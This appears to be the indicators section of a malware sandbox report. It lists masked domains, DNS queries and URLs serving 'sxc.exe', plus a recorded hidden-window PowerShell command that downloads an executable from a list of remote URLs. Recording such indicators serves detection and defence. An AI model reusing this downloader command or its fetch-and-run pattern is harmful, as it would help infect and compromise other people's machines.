Technical Information
- 'rs####sultores.pt':80
- 'si##ware.de':80
- 'si##ware.de':443
- 'ri#####nis-herdecke.de':80
- http://rs####sultores.pt/sxc.exe
- http://si##ware.de/sxc.exe
- 'si##ware.de':443
- DNS ASK fe####den-ichite.de
- DNS ASK rs####sultores.pt
- DNS ASK si##ware.de
- DNS ASK ri#####nis-herdecke.de
- DNS ASK fl####rtal.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://festreden-ichite.de/sxc.exe,http://rs...' (with hidden window)